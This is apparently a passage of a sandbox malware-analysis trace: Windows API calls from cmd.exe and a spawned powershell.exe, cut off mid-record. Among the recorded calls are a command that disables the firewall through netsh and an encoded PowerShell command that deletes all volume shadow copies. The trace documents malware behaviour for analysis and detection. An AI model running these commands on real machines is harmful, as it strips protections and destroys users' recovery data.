Locale=0x409, LCType=0x21, lpLCData=0x8ff65c, cchData=128 | out: lpLCData="0") returned 2 [0105.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x8ff65c, cchData=128 | out: lpLCData="1") returned 2 [0105.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xfbf81c, cchData=8 | out: lpLCData="/") returned 2 [0105.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xfbf7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0105.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xfbf778, cchData=32 | out: lpLCData="Tue") returned 4 [0105.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xfbf738, cchData=32 | out: lpLCData="Wed") returned 4 [0105.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xfbf6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0105.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xfbf6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0105.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xfbf678, cchData=32 | out: lpLCData="Sat") returned 4 [0105.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xfbf638, cchData=32 | out: lpLCData="Sun") returned 4 [0105.143] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xfbf80c, cchData=8 | out: lpLCData=".") returned 2 [0105.143] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xfbf7f8, cchData=8 | out: lpLCData=",") returned 2 [0105.143] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0105.144] GetProcessHeap () returned 0xbf0000 [0105.144] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x0, Size=0x20c) returned 0xbf7808 [0105.144] GetConsoleTitleW (in: lpConsoleTitle=0xbf7808, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0105.278] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0105.278] GetProcAddress (hModule=0x772d0000, lpProcName="CopyFileExW") returned 0x772e4330 [0105.278] GetProcAddress (hModule=0x772d0000, lpProcName="IsDebuggerPresent") returned 0x772e5930 [0105.278] GetProcAddress (hModule=0x772d0000, lpProcName="SetConsoleInputExeNameW") returned 0x74d009d0 [0105.278] ??_V@YAXPAX@Z () returned 0x1 [0105.278] GetProcessHeap () returned 0xbf0000 [0105.278] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0x400a) returned 0xbf8d48 [0105.278] GetProcessHeap () returned 0xbf0000 [0105.278] RtlFreeHeap (HeapHandle=0xbf0000, Flags=0x0, BaseAddress=0xbf8d48) returned 1 [0105.279] _wcsicmp (_String1="netsh", _String2=")") returned 69 [0105.279] _wcsicmp (_String1="FOR", _String2="netsh") returned -8 [0105.279] _wcsicmp (_String1="FOR/?", _String2="netsh") returned -8 [0105.279] _wcsicmp (_String1="IF", _String2="netsh") returned -5 [0105.279] _wcsicmp (_String1="IF/?", _String2="netsh") returned -5 [0105.279] _wcsicmp (_String1="REM", _String2="netsh") returned 4 [0105.279] _wcsicmp (_String1="REM/?", _String2="netsh") returned 4 [0105.279] GetProcessHeap () returned 0xbf0000 [0105.279] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0x58) returned 0xbf7a20 [0105.279] GetProcessHeap () returned 0xbf0000 [0105.279] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0x14) returned 0xbf7a80 [0105.280] GetProcessHeap () returned 0xbf0000 [0105.280] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0x42) returned 0xbf7aa0 [0105.280] GetConsoleTitleW (in: lpConsoleTitle=0x8ff550, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0105.348] malloc (_Size=0xffce) returned 0xd02638 [0105.354] ??_V@YAXPAX@Z () returned 0x8ff2dc [0105.355] malloc (_Size=0xffce) returned 0xd12610 [0105.355] ??_V@YAXPAX@Z () returned 0x8ff094 [0105.356] _wcsicmp (_String1="netsh", _String2="DIR") returned 10 [0105.356] _wcsicmp (_String1="netsh", _String2="ERASE") returned 9 [0105.356] _wcsicmp (_String1="netsh", _String2="DEL") returned 10 [0105.356] _wcsicmp (_String1="netsh", _String2="TYPE") returned -6 [0105.356] _wcsicmp (_String1="netsh", _String2="COPY") returned 11 [0105.356] _wcsicmp (_String1="netsh", _String2="CD") returned 11 [0105.356] _wcsicmp (_String1="netsh", _String2="CHDIR") returned 11 [0105.356] _wcsicmp (_String1="netsh", _String2="RENAME") returned -4 [0105.356] _wcsicmp (_String1="netsh", _String2="REN") returned -4 [0105.356] _wcsicmp (_String1="netsh", _String2="ECHO") returned 9 [0105.356] _wcsicmp (_String1="netsh", _String2="SET") returned -5 [0105.356] _wcsicmp (_String1="netsh", _String2="PAUSE") returned -2 [0105.356] _wcsicmp (_String1="netsh", _String2="DATE") returned 10 [0105.356] _wcsicmp (_String1="netsh", _String2="TIME") returned -6 [0105.356] _wcsicmp (_String1="netsh", _String2="PROMPT") returned -2 [0105.356] _wcsicmp (_String1="netsh", _String2="MD") returned 1 [0105.356] _wcsicmp (_String1="netsh", _String2="MKDIR") returned 1 [0105.356] _wcsicmp (_String1="netsh", _String2="RD") returned -4 [0105.356] _wcsicmp (_String1="netsh", _String2="RMDIR") returned -4 [0105.356] _wcsicmp (_String1="netsh", _String2="PATH") returned -2 [0105.356] _wcsicmp (_String1="netsh", _String2="GOTO") returned 7 [0105.356] _wcsicmp (_String1="netsh", _String2="SHIFT") returned -5 [0105.356] _wcsicmp (_String1="netsh", _String2="CLS") returned 11 [0105.357] _wcsicmp (_String1="netsh", _String2="CALL") returned 11 [0105.357] _wcsicmp (_String1="netsh", _String2="VERIFY") returned -8 [0105.357] _wcsicmp (_String1="netsh", _String2="VER") returned -8 [0105.357] _wcsicmp (_String1="netsh", _String2="VOL") returned -8 [0105.357] _wcsicmp (_String1="netsh", _String2="EXIT") returned 9 [0105.357] _wcsicmp (_String1="netsh", _String2="SETLOCAL") returned -5 [0105.357] _wcsicmp (_String1="netsh", _String2="ENDLOCAL") returned 9 [0105.357] _wcsicmp (_String1="netsh", _String2="TITLE") returned -6 [0105.357] _wcsicmp (_String1="netsh", _String2="START") returned -5 [0105.357] _wcsicmp (_String1="netsh", _String2="DPATH") returned 10 [0105.357] _wcsicmp (_String1="netsh", _String2="KEYS") returned 3 [0105.357] _wcsicmp (_String1="netsh", _String2="MOVE") returned 1 [0105.357] _wcsicmp (_String1="netsh", _String2="PUSHD") returned -2 [0105.357] _wcsicmp (_String1="netsh", _String2="POPD") returned -2 [0105.357] _wcsicmp (_String1="netsh", _String2="ASSOC") returned 13 [0105.357] _wcsicmp (_String1="netsh", _String2="FTYPE") returned 8 [0105.357] _wcsicmp (_String1="netsh", _String2="BREAK") returned 12 [0105.357] _wcsicmp (_String1="netsh", _String2="COLOR") returned 11 [0105.357] _wcsicmp (_String1="netsh", _String2="MKLINK") returned 1 [0105.357] _wcsicmp (_String1="netsh", _String2="DIR") returned 10 [0105.357] _wcsicmp (_String1="netsh", _String2="ERASE") returned 9 [0105.357] _wcsicmp (_String1="netsh", _String2="DEL") returned 10 [0105.357] _wcsicmp (_String1="netsh", _String2="TYPE") returned -6 [0105.357] _wcsicmp (_String1="netsh", _String2="COPY") returned 11 [0105.357] _wcsicmp (_String1="netsh", _String2="CD") returned 11 [0105.357] _wcsicmp (_String1="netsh", _String2="CHDIR") returned 11 [0105.357] _wcsicmp (_String1="netsh", _String2="RENAME") returned -4 [0105.357] _wcsicmp (_String1="netsh", _String2="REN") returned -4 [0105.357] _wcsicmp (_String1="netsh", _String2="ECHO") returned 9 [0105.357] _wcsicmp (_String1="netsh", _String2="SET") returned -5 [0105.357] _wcsicmp (_String1="netsh", _String2="PAUSE") returned -2 [0105.357] _wcsicmp (_String1="netsh", _String2="DATE") returned 10 [0105.357] _wcsicmp (_String1="netsh", _String2="TIME") returned -6 [0105.357] _wcsicmp (_String1="netsh", _String2="PROMPT") returned -2 [0105.357] _wcsicmp (_String1="netsh", _String2="MD") returned 1 [0105.358] _wcsicmp (_String1="netsh", _String2="MKDIR") returned 1 [0105.358] _wcsicmp (_String1="netsh", _String2="RD") returned -4 [0105.358] _wcsicmp (_String1="netsh", _String2="RMDIR") returned -4 [0105.358] _wcsicmp (_String1="netsh", _String2="PATH") returned -2 [0105.358] _wcsicmp (_String1="netsh", _String2="GOTO") returned 7 [0105.358] _wcsicmp (_String1="netsh", _String2="SHIFT") returned -5 [0105.358] _wcsicmp (_String1="netsh", _String2="CLS") returned 11 [0105.358] _wcsicmp (_String1="netsh", _String2="CALL") returned 11 [0105.358] _wcsicmp (_String1="netsh", _String2="VERIFY") returned -8 [0105.358] _wcsicmp (_String1="netsh", _String2="VER") returned -8 [0105.358] _wcsicmp (_String1="netsh", _String2="VOL") returned -8 [0105.358] _wcsicmp (_String1="netsh", _String2="EXIT") returned 9 [0105.358] _wcsicmp (_String1="netsh", _String2="SETLOCAL") returned -5 [0105.358] _wcsicmp (_String1="netsh", _String2="ENDLOCAL") returned 9 [0105.358] _wcsicmp (_String1="netsh", _String2="TITLE") returned -6 [0105.358] _wcsicmp (_String1="netsh", _String2="START") returned -5 [0105.358] _wcsicmp (_String1="netsh", _String2="DPATH") returned 10 [0105.358] _wcsicmp (_String1="netsh", _String2="KEYS") returned 3 [0105.358] _wcsicmp (_String1="netsh", _String2="MOVE") returned 1 [0105.358] _wcsicmp (_String1="netsh", _String2="PUSHD") returned -2 [0105.358] _wcsicmp (_String1="netsh", _String2="POPD") returned -2 [0105.358] _wcsicmp (_String1="netsh", _String2="ASSOC") returned 13 [0105.358] _wcsicmp (_String1="netsh", _String2="FTYPE") returned 8 [0105.358] _wcsicmp (_String1="netsh", _String2="BREAK") returned 12 [0105.358] _wcsicmp (_String1="netsh", _String2="COLOR") returned 11 [0105.358] _wcsicmp (_String1="netsh", _String2="MKLINK") returned 1 [0105.358] _wcsicmp (_String1="netsh", _String2="FOR") returned 8 [0105.358] _wcsicmp (_String1="netsh", _String2="IF") returned 5 [0105.358] _wcsicmp (_String1="netsh", _String2="REM") returned -4 [0105.359] ??_V@YAXPAX@Z () returned 0x1 [0105.359] GetProcessHeap () returned 0xbf0000 [0105.359] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0xffd6) returned 0xbf8d48 [0105.359] GetProcessHeap () returned 0xbf0000 [0105.359] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0x4e) returned 0xbf7af0 [0105.360] _wcsnicmp (_String1="nets", _String2="cmd ", _MaxCount=0x4) returned 11 [0105.360] malloc (_Size=0xffce) returned 0xd12610 [0105.360] ??_V@YAXPAX@Z () returned 0x8fee14 [0105.360] GetProcessHeap () returned 0xbf0000 [0105.360] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0x1ffa4) returned 0xc08d28 [0105.363] SetErrorMode (uMode=0x0) returned 0x0 [0105.363] SetErrorMode (uMode=0x1) returned 0x0 [0105.363] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0xc08d30, lpFilePart=0x8fee34 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x8fee34*="Desktop") returned 0x17 [0105.363] SetErrorMode (uMode=0x0) returned 0x1 [0105.363] GetProcessHeap () returned 0xbf0000 [0105.363] RtlReAllocateHeap (Heap=0xbf0000, Flags=0x0, Ptr=0xc08d28, Size=0x44) returned 0xc08d28 [0105.363] GetProcessHeap () returned 0xbf0000 [0105.363] RtlSizeHeap (HeapHandle=0xbf0000, Flags=0x0, MemoryPointer=0xc08d28) returned 0x44 [0105.364] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0105.364] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0105.364] GetProcessHeap () returned 0xbf0000 [0105.364] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0x1b4) returned 0xbf7b48 [0105.364] GetProcessHeap () returned 0xbf0000 [0105.364] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0x360) returned 0xbf7d08 [0105.370] GetProcessHeap () returned 0xbf0000 [0105.370] RtlReAllocateHeap (Heap=0xbf0000, Flags=0x0, Ptr=0xbf7d08, Size=0x1b6) returned 0xbf7d08 [0105.370] GetProcessHeap () returned 0xbf0000 [0105.370] RtlSizeHeap (HeapHandle=0xbf0000, Flags=0x0, MemoryPointer=0xbf7d08) returned 0x1b6 [0105.371] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0105.371] GetProcessHeap () returned 0xbf0000 [0105.371] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0xe0) returned 0xbf7ec8 [0105.371] GetProcessHeap () returned 0xbf0000 [0105.371] RtlReAllocateHeap (Heap=0xbf0000, Flags=0x0, Ptr=0xbf7ec8, Size=0x76) returned 0xbf7ec8 [0105.371] GetProcessHeap () returned 0xbf0000 [0105.371] RtlSizeHeap (HeapHandle=0xbf0000, Flags=0x0, MemoryPointer=0xbf7ec8) returned 0x76 [0105.371] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.371] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0x8febc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8febc0) returned 0xffffffff [0105.371] GetLastError () returned 0x2 [0105.371] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.371] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0x8febc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8febc0) returned 0xffffffff [0105.423] GetLastError () returned 0x2 [0105.423] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.423] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0x8febc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8febc0) returned 0xbf7f48 [0105.423] GetProcessHeap () returned 0xbf0000 [0105.423] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x0, Size=0x14) returned 0xbf7f88 [0105.423] FindClose (in: hFindFile=0xbf7f48 | out: hFindFile=0xbf7f48) returned 1 [0105.424] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\netsh.COM", fInfoLevelId=0x1, lpFindFileData=0x8febc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8febc0) returned 0xffffffff [0105.424] GetLastError () returned 0x2 [0105.424] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\netsh.EXE", fInfoLevelId=0x1, lpFindFileData=0x8febc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8febc0) returned 0xbf7f48 [0105.424] GetProcessHeap () returned 0xbf0000 [0105.424] RtlReAllocateHeap (Heap=0xbf0000, Flags=0x0, Ptr=0xbf7f88, Size=0x4) returned 0xbf7f88 [0105.424] FindClose (in: hFindFile=0xbf7f48 | out: hFindFile=0xbf7f48) returned 1 [0105.424] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0105.424] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0105.424] ??_V@YAXPAX@Z () returned 0x1 [0105.424] GetConsoleTitleW (in: lpConsoleTitle=0x8ff0c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0105.517] InitializeProcThreadAttributeList (in: lpAttributeList=0x8feff0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x8fefdc | out: lpAttributeList=0x8feff0, lpSize=0x8fefdc) returned 1 [0105.517] UpdateProcThreadAttribute (in: lpAttributeList=0x8feff0, dwFlags=0x0, Attribute=0x60001, lpValue=0x8fefd8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x8feff0, lpPreviousValue=0x0) returned 1 [0105.517] GetStartupInfoW (in: lpStartupInfo=0x8ff028 | out: lpStartupInfo=0x8ff028*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0105.517] GetProcessHeap () returned 0xbf0000 [0105.517] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0x18) returned 0xbf7f48 [0105.517] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0105.517] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0105.517] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0105.517] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.517] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0105.518] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0105.519] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0105.519] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0105.519] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0105.519] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0105.519] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0105.519] GetProcessHeap () returned 0xbf0000 [0105.519] RtlFreeHeap (HeapHandle=0xbf0000, Flags=0x0, BaseAddress=0xbf7f48) returned 1 [0105.519] GetProcessHeap () returned 0xbf0000 [0105.519] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0xa) returned 0xbf7f48 [0105.519] lstrcmpW (lpString1="\\netsh.exe", lpString2="\\XCOPY.EXE") returned -1 [0105.521] _get_osfhandle (_FileHandle=1) returned 0x90 [0105.521] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0105.582] _get_osfhandle (_FileHandle=0) returned 0x8c [0105.582] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0105.674] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\netsh.exe", lpCommandLine="netsh firewall set opmode disable", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8fef78*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="netsh firewall set opmode disable", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x8fefc4 | out: lpCommandLine="netsh firewall set opmode disable", lpProcessInformation=0x8fefc4*(hProcess=0xe0, hThread=0xdc, dwProcessId=0x728, dwThreadId=0x824)) returned 1 [0106.064] CloseHandle (hObject=0xdc) returned 1 [0106.064] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0106.064] GetProcessHeap () returned 0xbf0000 [0106.064] RtlFreeHeap (HeapHandle=0xbf0000, Flags=0x0, BaseAddress=0xbf6c40) returned 1 [0106.064] GetEnvironmentStringsW () returned 0xbf6c40* [0106.064] GetProcessHeap () returned 0xbf0000 [0106.064] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0xb1a) returned 0xbf4bb8 [0106.064] FreeEnvironmentStringsA (penv="=") returned 1 [0106.064] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0160.459] GetExitCodeProcess (in: hProcess=0xe0, lpExitCode=0x8fef5c | out: lpExitCode=0x8fef5c*=0x0) returned 1 [0160.460] CloseHandle (hObject=0xe0) returned 1 [0160.460] _vsnwprintf (in: _Buffer=0x8ff044, _BufferCount=0x13, _Format="%08X", _ArgList=0x8fef64 | out: _Buffer="00000000") returned 8 [0160.460] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0160.461] GetProcessHeap () returned 0xbf0000 [0160.461] RtlFreeHeap (HeapHandle=0xbf0000, Flags=0x0, BaseAddress=0xbf4bb8) returned 1 [0160.461] GetEnvironmentStringsW () returned 0xbf81f0* [0160.461] GetProcessHeap () returned 0xbf0000 [0160.461] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0xb40) returned 0xbf4bb8 [0160.462] FreeEnvironmentStringsA (penv="=") returned 1 [0160.462] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0160.462] GetProcessHeap () returned 0xbf0000 [0160.462] RtlFreeHeap (HeapHandle=0xbf0000, Flags=0x0, BaseAddress=0xbf4bb8) returned 1 [0160.462] GetEnvironmentStringsW () returned 0xbf81f0* [0160.462] GetProcessHeap () returned 0xbf0000 [0160.462] RtlAllocateHeap (HeapHandle=0xbf0000, Flags=0x8, Size=0xb40) returned 0xbf4bb8 [0160.462] FreeEnvironmentStringsA (penv="=") returned 1 [0160.462] GetProcessHeap () returned 0xbf0000 [0160.462] RtlFreeHeap (HeapHandle=0xbf0000, Flags=0x0, BaseAddress=0xbf7f48) returned 1 [0160.462] DeleteProcThreadAttributeList (in: lpAttributeList=0x8feff0 | out: lpAttributeList=0x8feff0) [0160.462] ??_V@YAXPAX@Z () returned 0x1 [0160.462] _get_osfhandle (_FileHandle=1) returned 0x90 [0160.462] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0160.707] _get_osfhandle (_FileHandle=1) returned 0x90 [0160.708] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xfc3890 | out: lpMode=0xfc3890) returned 1 [0160.867] _get_osfhandle (_FileHandle=1) returned 0x90 [0160.867] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0161.164] _get_osfhandle (_FileHandle=0) returned 0x8c [0161.164] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xfc3894 | out: lpMode=0xfc3894) returned 1 [0161.332] _get_osfhandle (_FileHandle=0) returned 0x8c [0161.333] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0161.479] SetConsoleInputExeNameW () returned 0x1 [0161.479] GetConsoleOutputCP () returned 0x1b5 [0161.650] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xfc3850 | out: lpCPInfo=0xfc3850) returned 1 [0161.650] SetThreadUILanguage (LangId=0x0) returned 0x760409 [0161.743] exit (_Code=0) [0161.743] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 58 os_tid = 0x1fc Process: id = "6" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x6c53f000" os_pid = "0x514" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1344" cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 39 os_tid = 0x7e4 [0104.654] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0104.657] RoInitialize () returned 0x1 [0104.657] RoUninitialize () returned 0x0 [0105.217] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0105.218] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0107.662] SysStringByteLen (bstr="-e") returned 0x4 [0107.662] SysStringByteLen (bstr="-e") returned 0x4 [0107.662] SysStringByteLen (bstr="RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==") returned 0x150 [0107.662] SysStringByteLen 